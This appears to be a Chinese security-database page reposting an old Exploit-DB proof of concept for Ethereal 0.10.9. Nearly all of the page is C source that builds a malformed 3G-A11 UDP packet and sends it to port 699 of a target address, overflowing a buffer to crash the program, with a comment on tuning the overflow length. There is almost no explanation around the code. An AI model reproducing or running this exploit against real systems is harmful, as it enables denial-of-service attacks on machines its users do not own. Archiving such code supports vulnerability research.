Ethereal 0.10.9 – Denial of Service

Ethereal 0.10.9 – Denial of Service

漏洞ID 1054957 漏洞类型
发布时间 2005-03-08 更新时间 2005-03-08
图片[1]-Ethereal 0.10.9 – Denial of Service-安全小百科CVE编号 N/A
图片[2]-Ethereal 0.10.9 – Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/867
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * 
 * Ethereal 3G-A11 remote buffer overflow PoC exploit 
 * --------------------------------------------------
 * Coded by Leon Juranic <[email protected]> 
 * LSS Security <http://security.lss.hr/en/>
 * 
 */ 

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>


main (int argc, char **argv)
{
	int sock;
	struct sockaddr_in sin;
	unsigned char buf[1024];
	char bla[200];

	sock=socket(AF_INET,SOCK_DGRAM,0);

	sin.sin_family=AF_INET;
	sin.sin_addr.s_addr = inet_addr(argv[1]);
	sin.sin_port = htons(699);

	buf[0] = 22;
	memset(buf+1,'A',19);
	buf[20] = 38;
	*(unsigned short*)&buf[22] = htons(100); 
	*(unsigned short*)&buf[28] = 0x0101;
	buf[30] = 31;
	buf[31] = 150;   // len for overflow...play with this value if it doesn't work

	memset (bla,'B',200);
	strncpy (buf+32,bla,180);
	
	sendto (sock,buf,200,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
}

// milw0rm.com [2005-03-08]

相关推荐: PHP-Nuke 6.0 Multiple Cross Site Scripting Vulnerabilities

PHP-Nuke 6.0 Multiple Cross Site Scripting Vulnerabilities 漏洞ID 1101158 漏洞类型 Input Validation Error 发布时间 2002-12-16 更新时间 2002-12-1…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享